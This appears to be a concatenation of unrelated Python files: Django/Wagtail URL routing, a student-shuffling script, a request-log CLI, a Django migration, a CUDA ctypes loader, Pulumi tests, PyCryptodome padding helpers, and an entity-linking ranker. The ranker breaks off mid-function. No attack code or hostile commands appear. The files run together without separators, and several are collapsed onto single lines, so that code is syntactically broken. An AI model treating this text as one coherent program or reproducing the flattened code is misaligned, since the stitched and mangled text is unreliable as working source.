from __future__ import absolute_import, unicode_literals from django.conf.urls import include, url from graphene_django.views import GraphQLView from wagtail.contrib.wagtailsitemaps import views as sitemaps_views from wagtail.contrib.wagtailsitemaps import Sitemap from wagtail.wagtailadmin import urls as wagtailadmin_urls from wagtail.wagtailcore import urls as wagtail_urls from wagtail.wagtailimages import urls as wagtailimages_urls from wagtail.wagtailsearch import urls as wagtailsearch_urls urlpatterns = [ url(r'^admin/', include(wagtailadmin_urls)), url(r'^search/', include(wagtailsearch_urls)), url(r'^images/', include(wagtailimages_urls)), url(r'^graphql', GraphQLView.as_view(graphiql=True)), url(r'^sitemap\.xml$', sitemaps_views.sitemap), url(r'^sitemap-index\.xml$', sitemaps_views.index, { 'sitemaps': {'pages': Sitemap}, 'sitemap_url_name': 'sitemap', }), url(r'^sitemap-(?P<section>.+)\.xml$', sitemaps_views.sitemap, name='sitemap'), # For anything not caught by a more specific rule above, hand over to # Wagtail's serving mechanism url(r'', include(wagtail_urls)), ]
import random

a1 = input('First student:')
a2 = input('Second student:')
a3 = input('Third student:')
a4 = input('Fourth student:')
lista = [a1, a2, a3, a4]
random.shuffle(lista)
print('The order will be:')
print(lista)
import maglica.request_log
import maglica.util
from termcolor import cprint
import json


def status(args):
    options = {
        "mandatory": ["id"],
        "optional": [],
    }
    maglica.util.check_args(args, options)
    request_log = maglica.request_log.RequestLog()
    row = request_log.get_status(args["id"])
    _print(row)


def tail(args):
    request_log = maglica.request_log.RequestLog()
    rows = request_log.tail()
    for row in rows:
        _print(row)


def _print(row):
    status = row["status"]
    args = json.loads(row["args"])
    message = row["message"]
    if status == 0:
        cprint("In progress", "yellow")
        options = []
        for key in args["args"].keys():
            options.append("--%s=%s" % (key, args["args"][key]))
        options = " ".join(options)
        log = "Running %s %s %s" % (args["type"], args["action"], options)
        if "host" in args:
            log = "%s on %s" % (log, args["host"])
        print(log)
    elif status == 1:
        cprint("Completed", "green")
    elif status == 2:
        cprint("Error", "red")
        if message:
            print(message)
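# Illustrative use from a CLI dispatcher (the request id below is hypothetical):
#
#   status({"id": "42"})   # print the state of request 42
#   tail({})               # print the most recent request log entries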
from ._version import __version__ from .Azure_Hbase import AzHbaseRestAPI from .utils import df_to_dict from .utils import base64_to_string from .utils import string_to_base64
# Generated by Django 3.0.8 on 2020-08-31 16:47 from django.conf import settings from django.db import migrations, models import django.db.models.deletion import django.utils.timezone class Migration(migrations.Migration): initial = True dependencies = [ ('auth', '0011_update_proxy_permissions'), ] operations = [ migrations.CreateModel( name='User', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('password', models.CharField(max_length=128, verbose_name='password')), ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')), ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')), ('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')), ('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')), ('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')), ('email', models.EmailField(max_length=255, unique=True, verbose_name='Email')), ('name', models.CharField(max_length=100)), ('last_seen', models.DateTimeField()), ('room_joined_on', models.DateTimeField(default=None, null=True)), ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')), ], options={ 'verbose_name': 'user', 'verbose_name_plural': 'users', 'abstract': False, }, ), migrations.CreateModel( name='Artist', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='Room', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('created_on', models.DateTimeField()), ('is_paused', models.BooleanField(default=False)), ('paused_on', models.DateTimeField(default=None, null=True)), ('duration_to_complete', models.TimeField()), ('play_start_time', models.DateTimeField()), ('no_tracks', models.IntegerField(default=0)), ('code', models.CharField(default=None, max_length=50, null=True)), ('access_users', models.ManyToManyField(related_name='access_to_rooms', to=settings.AUTH_USER_MODEL)), ], ), migrations.CreateModel( name='Track', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('added_on', models.DateTimeField()), ('title', models.CharField(max_length=255)), ('artists', models.CharField(max_length=255)), ('duration', models.TimeField()), ('plays_count', models.IntegerField()), ('ref_id', models.CharField(default=None, max_length=255, null=True)), ('storage_bucket', models.CharField(max_length=255)), ('playback_path', models.CharField(max_length=255)), ('image_path', models.CharField(default=None, max_length=255, null=True)), ], ), migrations.CreateModel( name='RoomTrack', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('added_on', models.DateTimeField()), ('next_roomtrack', models.OneToOneField(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, 
related_name='previous_roomtrack', to='musicroom.RoomTrack')), ('room', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='roomtracks', to='musicroom.Room')), ('track', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='+', to='musicroom.Track')), ], ), migrations.AddField( model_name='room', name='current_roomtrack', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='musicroom.RoomTrack'), ), migrations.AddField( model_name='user', name='room', field=models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='members', to='musicroom.Room'), ), migrations.AddField( model_name='user', name='user_permissions', field=models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions'), ), migrations.CreateModel( name='Friendship', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('init_on', models.DateTimeField()), ('is_accepted', models.BooleanField()), ('accepted_on', models.DateTimeField(default=None, null=True)), ('score', models.IntegerField()), ('common_time', models.TimeField()), ('user1', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user1_set', to=settings.AUTH_USER_MODEL)), ('user2', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user2_set', to=settings.AUTH_USER_MODEL)), ], options={ 'unique_together': {('user1', 'user2')}, }, ), ]
import os, sys, struct import ctypes import ctypes.util from functools import wraps from typing import Callable, TypeVar import logging logger = logging.getLogger(__name__) LibCall = TypeVar("LibCall") def lookup_dll(prefix): paths = os.environ.get("PATH", "").split(os.pathsep) for path in paths: if not os.path.exists(path): continue for name in os.listdir(path): if name.startswith(prefix) and name.lower().endswith(".dll"): return os.path.join(path, name) return None def unix_find_lib(name): cuda_path = os.environ.get("CUDA_PATH", None) if cuda_path is not None: lib_name = os.path.join(cuda_path, "lib64", "lib%s.so" % name) if os.path.exists(lib_name): return lib_name cuda_path = "/usr/local/cuda" if cuda_path is not None: lib_name = os.path.join(cuda_path, "lib64", "lib%s.so" % name) if os.path.exists(lib_name): return lib_name lib_name = ctypes.util.find_library(name) return lib_name def windows_find_lib(name): lib_name = "%s%d_" % (name, struct.calcsize("P") * 8) return lookup_dll(lib_name) class Lib: def __init__(self, name): self.__name = name if sys.platform.startswith("win"): lib_path = windows_find_lib(self.__name) self.__lib_path = lib_path if lib_path is not None: self.__lib = ctypes.WinDLL(lib_path) else: self.__lib = None elif sys.platform.startswith("linux"): lib_path = unix_find_lib(self.__name) self.__lib_path = lib_path if lib_path is not None: self.__lib = ctypes.cdll.LoadLibrary(lib_path) else: self.__lib = None else: raise RuntimeError("Unknown platform: %s" % sys.platform) @staticmethod def from_lib(name, lib): ret = Lib(name) ret.__lib = lib return ret def bind(self, name, arg_types, ret_type) -> Callable[[LibCall], LibCall]: if self.__lib is None: def decorator(f): @wraps(f) def wrapper(*args, **kwargs): raise RuntimeError("Library %s is not initialized" % self.__name) return wrapper return decorator else: try: func = getattr(self.__lib, name) except AttributeError: # Name not found in library def decorator(f): @wraps(f) def wrapper(*args, **kwargs): raise AttributeError("%s: undefined symbol: %s" % (self.__lib_path, name)) return wrapper logger.warning("Symbol %s not found in %s", name, self.__lib_path) return decorator func.argtypes = arg_types func.restype = ret_type setattr(self, name, func) def decorator(f): @wraps(f) def wrapper(*args, **kwargs): return f(*args, **kwargs) return wrapper return decorator
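# Usage sketch (assumes a CUDA runtime shared library can be located; the bound
# symbol follows the public cudaGetDeviceCount(int*) signature, but this
# binding is only an example and not part of the module):
if __name__ == "__main__":
    cudart = Lib("cudart")

    @cudart.bind("cudaGetDeviceCount", [ctypes.POINTER(ctypes.c_int)], ctypes.c_int)
    def device_count() -> int:
        count = ctypes.c_int(0)
        cudart.cudaGetDeviceCount(ctypes.byref(count))  # call the bound C symbol
        return count.value

    print("CUDA devices:", device_count())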
# Copyright 2016-2020, Pulumi Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest from typing import Optional import pulumi import pulumi._types as _types CAMEL_TO_SNAKE_CASE_TABLE = { "firstValue": "first_value", "secondValue": "second_value", } @pulumi.output_type class MyOutputType: first_value: str = pulumi.property("firstValue") second_value: Optional[float] = pulumi.property("secondValue", default=None) @pulumi.output_type class MyOutputTypeDict(dict): first_value: str = pulumi.property("firstValue") second_value: Optional[float] = pulumi.property("secondValue", default=None) @pulumi.output_type class MyOutputTypeTranslated: first_value: str = pulumi.property("firstValue") second_value: Optional[float] = pulumi.property("secondValue", default=None) def _translate_property(self, prop): return CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop @pulumi.output_type class MyOutputTypeDictTranslated(dict): first_value: str = pulumi.property("firstValue") second_value: Optional[float] = pulumi.property("secondValue", default=None) def _translate_property(self, prop): return CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop @pulumi.output_type class MyDeclaredPropertiesOutputType: def __init__(self, first_value: str, second_value: Optional[float] = None): pulumi.set(self, "first_value", first_value) if second_value is not None: pulumi.set(self, "second_value", second_value) # Property with empty body. @property @pulumi.getter(name="firstValue") def first_value(self) -> str: """First value docstring.""" ... # Property with implementation. @property @pulumi.getter(name="secondValue") def second_value(self) -> Optional[float]: """Second value docstring.""" return pulumi.get(self, "second_value") @pulumi.output_type class MyDeclaredPropertiesOutputTypeDict(dict): def __init__(self, first_value: str, second_value: Optional[float] = None): pulumi.set(self, "first_value", first_value) if second_value is not None: pulumi.set(self, "second_value", second_value) # Property with empty body. @property @pulumi.getter(name="firstValue") def first_value(self) -> str: """First value docstring.""" ... # Property with implementation. @property @pulumi.getter(name="secondValue") def second_value(self) -> Optional[float]: """Second value docstring.""" return pulumi.get(self, "second_value") @pulumi.output_type class MyDeclaredPropertiesOutputTypeTranslated: def __init__(self, first_value: str, second_value: Optional[float] = None): pulumi.set(self, "first_value", first_value) if second_value is not None: pulumi.set(self, "second_value", second_value) # Property with empty body. @property @pulumi.getter(name="firstValue") def first_value(self) -> str: """First value docstring.""" ... # Property with implementation. 
@property @pulumi.getter(name="secondValue") def second_value(self) -> Optional[float]: """Second value docstring.""" return pulumi.get(self, "second_value") def _translate_property(self, prop): return CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop @pulumi.output_type class MyDeclaredPropertiesOutputTypeDictTranslated(dict): def __init__(self, first_value: str, second_value: Optional[float] = None): pulumi.set(self, "first_value", first_value) if second_value is not None: pulumi.set(self, "second_value", second_value) # Property with empty body. @property @pulumi.getter(name="firstValue") def first_value(self) -> str: """First value docstring.""" ... # Property with implementation. @property @pulumi.getter(name="secondValue") def second_value(self) -> Optional[float]: """Second value docstring.""" return pulumi.get(self, "second_value") def _translate_property(self, prop): return CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop class InputTypeTests(unittest.TestCase): def test_decorator_raises(self): with self.assertRaises(AssertionError) as cm: @pulumi.output_type @pulumi.input_type class Foo: pass with self.assertRaises(AssertionError) as cm: @pulumi.output_type @pulumi.input_type class Bar: pass def test_is_output_type(self): types = [ MyOutputType, MyOutputTypeDict, MyOutputTypeTranslated, MyOutputTypeDictTranslated, MyDeclaredPropertiesOutputType, MyDeclaredPropertiesOutputTypeDict, MyDeclaredPropertiesOutputTypeTranslated, MyDeclaredPropertiesOutputTypeDictTranslated, ] for typ in types: self.assertTrue(_types.is_output_type(typ)) self.assertEqual(True, typ._pulumi_output_type) self.assertTrue(hasattr(typ, "__init__")) def test_output_type_types(self): self.assertEqual({ "firstValue": str, "secondValue": float, }, _types.output_type_types(MyOutputType)) def test_output_type(self): types = [ (MyOutputType, False), (MyOutputTypeDict, False), (MyOutputTypeTranslated, False), (MyOutputTypeDictTranslated, False), (MyDeclaredPropertiesOutputType, True), (MyDeclaredPropertiesOutputTypeDict, True), (MyDeclaredPropertiesOutputTypeTranslated, True), (MyDeclaredPropertiesOutputTypeDictTranslated, True), ] for typ, has_doc in types: self.assertTrue(hasattr(typ, "__init__")) t = _types.output_type_from_dict(typ, {"firstValue": "hello", "secondValue": 42}) self.assertEqual("hello", t.first_value) self.assertEqual(42, t.second_value) if isinstance(t, dict): self.assertEqual("hello", t["first_value"]) self.assertEqual(42, t["second_value"]) first = typ.first_value self.assertIsInstance(first, property) self.assertTrue(callable(first.fget)) self.assertEqual("first_value", first.fget.__name__) self.assertEqual({"return": str}, first.fget.__annotations__) if has_doc: self.assertEqual("First value docstring.", first.fget.__doc__) self.assertEqual("firstValue", first.fget._pulumi_name) second = typ.second_value self.assertIsInstance(second, property) self.assertTrue(callable(second.fget)) self.assertEqual("second_value", second.fget.__name__) self.assertEqual({"return": Optional[float]}, second.fget.__annotations__) if has_doc: self.assertEqual("Second value docstring.", second.fget.__doc__) self.assertEqual("secondValue", second.fget._pulumi_name) self.assertTrue(hasattr(t, "__eq__")) self.assertTrue(t.__eq__(t)) self.assertTrue(t == t) self.assertFalse(t != t) self.assertFalse(t == "not equal") t2 = _types.output_type_from_dict(typ, {"firstValue": "hello", "secondValue": 42}) self.assertTrue(t.__eq__(t2)) self.assertTrue(t == t2) self.assertFalse(t != t2) if isinstance(t2, dict): self.assertEqual("hello", 
t2["first_value"]) self.assertEqual(42, t2["second_value"]) t3 = _types.output_type_from_dict(typ, {"firstValue": "foo", "secondValue": 1}) self.assertFalse(t.__eq__(t3)) self.assertFalse(t == t3) self.assertTrue(t != t3) if isinstance(t3, dict): self.assertEqual("foo", t3["first_value"]) self.assertEqual(1, t3["second_value"])
# # -*- coding: utf-8 -*- # # Util/Padding.py : Functions to manage padding # # =================================================================== # The contents of this file are dedicated to the public domain. To # the extent that dedication to the public domain is not available, # everyone is granted a worldwide, perpetual, royalty-free, # non-exclusive license to exercise all rights associated with the # contents of this file for any purpose whatsoever. # No rights are reserved. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # =================================================================== """ Functions to manage padding This module provides minimal support for adding and removing standard padding from data. """ __all__ = [ 'ValueError', 'pad', 'unpad' ] from Crypto.Util.py3compat import * def pad(data_to_pad, block_size, style='pkcs7'): """Apply standard padding. :Parameters: data_to_pad : byte string The data that needs to be padded. block_size : integer The block boundary to use for padding. The output length is guaranteed to be a multiple of ``block_size``. style : string Padding algorithm. It can be *'pkcs7'* (default), *'iso7816'* or *'x923'*. :Return: The original data with the appropriate padding added at the end. """ padding_len = block_size-len(data_to_pad)%block_size if style == 'pkcs7': padding = bchr(padding_len)*padding_len elif style == 'x923': padding = bchr(0)*(padding_len-1) + bchr(padding_len) elif style == 'iso7816': padding = bchr(128) + bchr(0)*(padding_len-1) else: raise ValueError("Unknown padding style") return data_to_pad + padding def unpad(padded_data, block_size, style='pkcs7'): """Remove standard padding. :Parameters: padded_data : byte string A piece of data with padding that needs to be stripped. block_size : integer The block boundary to use for padding. The input length must be a multiple of ``block_size``. style : string Padding algorithm. It can be *'pkcs7'* (default), *'iso7816'* or *'x923'*. :Return: Data without padding. :Raises ValueError: if the padding is incorrect. """ pdata_len = len(padded_data) if pdata_len % block_size: raise ValueError("Input data is not padded") if style in ('pkcs7', 'x923'): padding_len = bord(padded_data[-1]) if padding_len<1 or padding_len>min(block_size, pdata_len): raise ValueError("Padding is incorrect.") if style == 'pkcs7': if padded_data[-padding_len:]!=bchr(padding_len)*padding_len: raise ValueError("PKCS#7 padding is incorrect.") else: if padded_data[-padding_len:-1]!=bchr(0)*(padding_len-1): raise ValueError("ANSI X.923 padding is incorrect.") elif style == 'iso7816': padding_len = pdata_len - padded_data.rfind(bchr(128)) if padding_len<1 or padding_len>min(block_size, pdata_len): raise ValueError("Padding is incorrect.") if padding_len>1 and padded_data[1-padding_len:]!=bchr(0)*(padding_len-1): raise ValueError("ISO 7816-4 padding is incorrect.") else: raise ValueError("Unknown padding style") return padded_data[:-padding_len]
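# Quick illustration of the helpers above (shown as comments so the module's
# public surface is unchanged):
#
#   >>> pad(b'hello', 16)                      # PKCS#7: 11 bytes of value 0x0b
#   b'hello\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b'
#   >>> unpad(pad(b'hello', 16), 16)
#   b'hello'
#   >>> pad(b'hello', 16, style='iso7816')     # 0x80 marker then zero fill
#   b'hello\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'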
import nel.ntee as ntee from nel.vocabulary import Vocabulary import torch from torch.autograd import Variable import torch.nn.functional as F import numpy as np import nel.dataset as D from tqdm import tqdm from nel.abstract_word_entity import load as load_model from nel.mulrel_ranker import MulRelRanker from nel.first_selection import choose_cands import nel.utils as utils from random import shuffle import torch.optim as optim from pprint import pprint from hanziconv import HanziConv import jieba import time import pickle ModelClass = MulRelRanker wiki_prefix = 'en.wikipedia.org/wiki/' preprocessing_path = 'nel/preprocessing/' class EDRanker: """ ranking candidates """ def __init__(self, config): print('--- create model ---') config['entity_embeddings'] = config['entity_embeddings'] / \ np.maximum(np.linalg.norm(config['entity_embeddings'], axis=1, keepdims=True), 1e-12) config['entity_embeddings'][config['entity_voca'].unk_id] = 1e-10 config['word_embeddings'] = config['word_embeddings'] / \ np.maximum(np.linalg.norm(config['word_embeddings'], axis=1, keepdims=True), 1e-12) config['word_embeddings'][config['word_voca'].unk_id] = 1e-10 print('prerank model') self.prerank_model = ntee.NTEE(config) self.args = config['args'] print('main model') # by Cheng if self.args.mode == 'pretrain': self.model = pretrain_cands(config) elif self.args.mode == 'eval': print('try loading model from', self.args.model_path) self.model = load_model(self.args.model_path, ModelClass) else: print('create new model') if config['mulrel_type'] == 'rel-norm': config['use_stargmax'] = False if config['mulrel_type'] == 'ment-norm': config['first_head_uniform'] = False config['use_pad_ent'] = True config['use_local'] = True config['use_local_only'] = False config['oracle'] = False self.model = ModelClass(config) self.prerank_model.cuda() self.model.cuda() def prerank(self, dataset, predict=False): new_dataset = [] has_gold = 0 total = 0 f = 0 for content in dataset: #content is a doc(include mentions) items = [] f+=1 if self.args.keep_ctx_ent > 0: # rank the candidates by ntee scores lctx_ids = [m['context'][0][max(len(m['context'][0]) - self.args.prerank_ctx_window // 2, 0):] for m in content] rctx_ids = [m['context'][1][:min(len(m['context'][1]), self.args.prerank_ctx_window // 2)] for m in content] ment_ids = [[] for m in content] #meaning? 
token_ids = [l + m + r if len(l) + len(r) > 0 else [self.prerank_model.word_voca.unk_id] for l, m, r in zip(lctx_ids, ment_ids, rctx_ids)] #combine all the left right context wiki id entity_ids = [m['cands'] for m in content] entity_ids = Variable(torch.LongTensor(entity_ids).cuda()) entity_mask = [m['mask'] for m in content] entity_mask = Variable(torch.FloatTensor(entity_mask).cuda()) token_ids, token_offsets = utils.flatten_list_of_lists(token_ids) token_offsets = Variable(torch.LongTensor(token_offsets).cuda()) token_ids = Variable(torch.LongTensor(token_ids).cuda()) log_probs = self.prerank_model.forward(token_ids, token_offsets, entity_ids, use_sum=True) log_probs = (log_probs * entity_mask).add_((entity_mask - 1).mul_(1e10)) #use mask to let the unk_id won't be choose #topk will return (score,order of the score) #so the model didn't use the log_prob to train the model just choose the candidates _, top_pos = torch.topk(log_probs, dim=1, k=self.args.keep_ctx_ent) top_pos = top_pos.data.cpu().numpy() else: top_pos = [[]] * len(content) # select candidats: mix between keep_ctx_ent best candidates (ntee scores) with # keep_p_e_m best candidates (p_e_m scores) for i, m in enumerate(content): #so m means the mention of this doc sm = {'cands': [], 'named_cands': [], 'p_e_m': [], 'mask': [], 'true_pos': -1} m['selected_cands'] = sm selected = set(top_pos[i]) idx = 0 while len(selected) < self.args.keep_ctx_ent + self.args.keep_p_e_m: if idx not in selected: selected.add(idx) idx += 1 selected = sorted(list(selected)) for idx in selected: sm['cands'].append(m['cands'][idx]) sm['named_cands'].append(m['named_cands'][idx]) sm['p_e_m'].append(m['p_e_m'][idx]) sm['mask'].append(m['mask'][idx]) if idx == m['true_pos']: sm['true_pos'] = len(sm['cands']) - 1 if not predict: if sm['true_pos'] == -1: continue # this insertion only makes the performance worse (why???) 
# sm['true_pos'] = 0 # sm['cands'][0] = m['cands'][m['true_pos']] # sm['named_cands'][0] = m['named_cands'][m['true_pos']] # sm['p_e_m'][0] = m['p_e_m'][m['true_pos']] # sm['mask'][0] = m['mask'][m['true_pos']] items.append(m) if sm['true_pos'] >= 0: has_gold += 1 total += 1 if predict: # only for oracle model, not used for eval if sm['true_pos'] == -1: sm['true_pos'] = 0 # a fake gold, happens only 2%, but avoid the non-gold if len(items) > 0: new_dataset.append(items) print('recall', has_gold / total) return new_dataset def get_data_items(self, dataset, data_name, predict=False): data = [] cand_source = 'candidates' save_cands = {} # save preprocessing (cheng) tStart = time.time() for doc_name, content in tqdm(dataset.items()): items = [] conll_doc = content[0].get('conll_doc', None) chosed = choose_cands().ment_cos(content, self.args.cands_threshold, self.args.keep_top, self.args.n_cands_before_rank) content_tmp = [] # save preprocessing (cheng) for m in content: named_cands = chosed[m['mention']]['named_cands'] p_e_m = chosed[m['mention']]['p_e_m'] gt_pos = [c[0] for c in m['candidates']] gt_p_e_m = [min(1., max(1e-3, c[1])) for c in m['candidates']] named_cands_t = [] # avoid variable to change dict value named_cands_t += chosed[m['mention']]['named_cands'] p_e_m_t = [] # avoid variable to change dict value p_e_m_t += chosed[m['mention']]['p_e_m'] try: true_pos = named_cands_t.index(m['gold'][0]) p = p_e_m_t[true_pos] except: # now we are not choose base on top30, so the list chosen by our way could be[0,1,2,6,15,17,...], # but we let the list to reorder by[0,1,2,...,29], # when we didn't choose the gt, we let the gt to be the order 31, cause gt could be the order 4 in the oringinal order, # but we just choose [0,1,2,6,...](i.e. 4 is not inside), when the model is training we want every mention could have gt, # so we do this. if m['gold'][0] in gt_pos: true_pos = gt_pos.index(m['gold'][0]) p = gt_p_e_m[true_pos] true_pos = len(named_cands_t) + 1 else: true_pos = -1 content_tmp.append({'true_pos':true_pos, 'p_e_m':p_e_m, 'named_cands':named_cands}) # save preprocessing (cheng) #while is training change the last cand to gold if true_pos >= len(named_cands_t): if not predict: true_pos = len(named_cands_t) - 1 p_e_m_t[-1] = p named_cands_t[-1] = m['gold'][0] else: # if is on predict then the ture_position is not exist true_pos = -1 cands = [self.model.entity_voca.get_id(wiki_prefix + c) for c in named_cands_t] mask = [1.] * len(cands) if len(cands) == 0 and not predict: continue elif len(cands) < self.args.n_cands_before_rank: # if len(cands) < top 30 candidate, then padding unk candidate to array cands += [self.model.entity_voca.unk_id] * (self.args.n_cands_before_rank - len(cands)) #cands represent candidate wili id named_cands_t += [Vocabulary.unk_token] * (self.args.n_cands_before_rank - len(named_cands_t)) #named_cands represent candidate's name p_e_m_t += [1e-8] * (self.args.n_cands_before_rank - len(p_e_m_t)) mask += [0.] 
* (self.args.n_cands_before_rank - len(mask)) #if exist mask = 1 else =0 if self.args.language == 'en': lctx = m['context'][0].strip().split() lctx_ids = [self.prerank_model.word_voca.get_id(t) for t in lctx if utils.is_important_word(t)] lctx_ids = [tid for tid in lctx_ids if tid != self.prerank_model.word_voca.unk_id] #drop unk id word lctx_ids = lctx_ids[max(0, len(lctx_ids) - self.args.ctx_window//2):] #if lctx len >50 then drop the word before 50 words rctx = m['context'][1].strip().split() rctx_ids = [self.prerank_model.word_voca.get_id(t) for t in rctx if utils.is_important_word(t)] rctx_ids = [tid for tid in rctx_ids if tid != self.prerank_model.word_voca.unk_id] rctx_ids = rctx_ids[:min(len(rctx_ids), self.args.ctx_window//2)] elif self.args.language == 'zh': lctx = HanziConv.toSimplified(m['context'][0].strip()) lctx = jieba.lcut(lctx) lctx_ids = [self.prerank_model.word_voca.get_id(t) for t in lctx if utils.is_important_word(t)] lctx_ids = [tid for tid in lctx_ids if tid != self.prerank_model.word_voca.unk_id] lctx_ids = lctx_ids[max(0, len(lctx_ids) - self.args.ctx_window//2):] rctx = HanziConv.toSimplified(m['context'][1].strip()) rctx = jieba.lcut(rctx) rctx_ids = [self.prerank_model.word_voca.get_id(t) for t in rctx if utils.is_important_word(t)] rctx_ids = [tid for tid in rctx_ids if tid != self.prerank_model.word_voca.unk_id] rctx_ids = rctx_ids[:min(len(rctx_ids), self.args.ctx_window//2)] ment = m['mention'].strip().split() ment_ids = [self.prerank_model.word_voca.get_id(t) for t in ment if utils.is_important_word(t)] ment_ids = [tid for tid in ment_ids if tid != self.prerank_model.word_voca.unk_id] m['sent'] = ' '.join(lctx + rctx) # secondary local context (for computing relation scores) #snd_local context only have small len(before '') if conll_doc is not None: conll_m = m['conll_m'] sent = conll_doc['sentences'][conll_m['sent_id']] start = conll_m['start'] end = conll_m['end'] snd_lctx = [self.model.snd_word_voca.get_id(t) for t in sent[max(0, start - self.args.snd_local_ctx_window//2):start]] snd_rctx = [self.model.snd_word_voca.get_id(t) for t in sent[end:min(len(sent), end + self.args.snd_local_ctx_window//2)]] snd_ment = [self.model.snd_word_voca.get_id(t) for t in sent[start:end]] if len(snd_lctx) == 0: snd_lctx = [self.model.snd_word_voca.unk_id] if len(snd_rctx) == 0: snd_rctx = [self.model.snd_word_voca.unk_id] if len(snd_ment) == 0: snd_ment = [self.model.snd_word_voca.unk_id] else: snd_lctx = [self.model.snd_word_voca.unk_id] snd_rctx = [self.model.snd_word_voca.unk_id] snd_ment = [self.model.snd_word_voca.unk_id] items.append({'context': (lctx_ids, rctx_ids), 'snd_ctx': (snd_lctx, snd_rctx), 'ment_ids': ment_ids, 'snd_ment': snd_ment, 'cands': cands, 'named_cands': named_cands_t, 'p_e_m': p_e_m_t, 'mask': mask, 'true_pos': true_pos, 'doc_name': doc_name, 'raw': m }) if len(items) > 0: # note: this shouldn't affect the order of prediction because we use doc_name to add predicted entities, # and we don't shuffle the data for prediction if len(items) > 100: print(len(items)) #means this docs have >100 mentions for k in range(0, len(items), 100): data.append(items[k:min(len(items), k + 100)]) else: data.append(items) save_cands[doc_name] = content_tmp # save preprocessing (cheng) tEnd = time.time() print("It cost %.4f min" % ((tEnd - tStart)/60)) with open(preprocessing_path + data_name + '.pickle', 'wb') as fp: # save preprocessing (cheng) pickle.dump(save_cands, fp, protocol=pickle.HIGHEST_PROTOCOL) return self.prerank(data, predict) def 
get_data_items_load(self, dataset, data_name, predict=False): data = [] cand_source = 'candidates' tStart = time.time() # load preprocessing pickle with open(preprocessing_path + data_name + '.pickle', 'rb') as fp: pre_data = pickle.load(fp) for doc_name, content in dataset.items(): items = [] conll_doc = content[0].get('conll_doc', None) count = 0 # for pickle for m in content: #load pre_data (cheng) named_cands = [] # avoid variable to change dict value named_cands += pre_data[doc_name][count]['named_cands'] p_e_m = [] # avoid variable to change dict value p_e_m = pre_data[doc_name][count]['p_e_m'] true_pos = pre_data[doc_name][count]['true_pos'] gt_pos = [c[0] for c in m['candidates']] gt_p_e_m = [min(1., max(1e-3, c[1])) for c in m['candidates']] try: true_pos = named_cands.index(m['gold'][0]) p = p_e_m[true_pos] except: if m['gold'][0] in gt_pos: true_pos = gt_pos.index(m['gold'][0]) p = gt_p_e_m[true_pos] true_pos = len(named_cands) + 1 else: true_pos = -1 #while is training change the last cand to gold if true_pos >= len(named_cands): if not predict: true_pos = len(named_cands) - 1 p_e_m[-1] = p named_cands[-1] = m['gold'][0] else: # if is on predict then the ture_position is not exist true_pos = -1 cands = [self.model.entity_voca.get_id(wiki_prefix + c) for c in named_cands] mask = [1.] * len(cands) if len(cands) == 0 and not predict: continue elif len(cands) < self.args.n_cands_before_rank: # if len(cands) < top 30 candidate, then padding unk candidate to array cands += [self.model.entity_voca.unk_id] * (self.args.n_cands_before_rank - len(cands)) #cands represent candidate wili id named_cands += [Vocabulary.unk_token] * (self.args.n_cands_before_rank - len(named_cands)) #named_cands represent candidate's name p_e_m += [1e-8] * (self.args.n_cands_before_rank - len(p_e_m)) mask += [0.] 
